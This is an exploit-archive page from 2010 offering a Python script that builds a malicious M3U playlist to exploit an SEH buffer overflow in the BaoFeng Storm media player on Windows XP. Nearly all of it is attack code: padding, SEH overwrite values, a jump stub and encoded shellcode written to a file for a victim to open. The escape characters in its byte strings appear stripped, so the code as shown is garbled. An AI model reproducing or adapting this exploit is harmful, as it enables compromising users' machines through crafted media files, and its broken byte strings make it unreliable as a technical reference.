BaoFeng Storm M3U File Processing Buffer Overflow Exploit
Posted on 06 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>BaoFeng Storm M3U File Processing Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================= BaoFeng Storm M3U File Processing Buffer Overflow Exploit ========================================================= #!/usr/bin/env python ################################################################# # # Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit # CNVD-ID: CNVD-2010-00752 # Download: www.baofeng.com # Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file # Platform: Windows XPSP3 Chinese Simplified # Vulnerable: Storm2012 3.10.4.21 # Storm2012 3.10.4.16 # Storm2012 3.10.4.8 # Storm2012 3.10.3.17 # Storm2012 3.10.2.5 # Storm2012 3.10.1.12 ################################################################# # Code : file= "baofeng.m3u" junk ="x41"*795 nseh="x61xe8xe1" seh="xaaxd7x40" jmp ="x53x53x6dx58x6dx05x11x22x6dx2dx10x22x6dxacxe4" nops ="x42" * 110 shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZA" "BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA" "58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB" "AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K" "22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL" "MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55" "Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V" "NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB" "R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT" "NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU" "89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM" "KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC" "QQ2LRCM0LJA") fobj=open(file,"w") payload=junk+nseh+seh+jmp+nops+shellcode fobj.write(payload) fobj.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>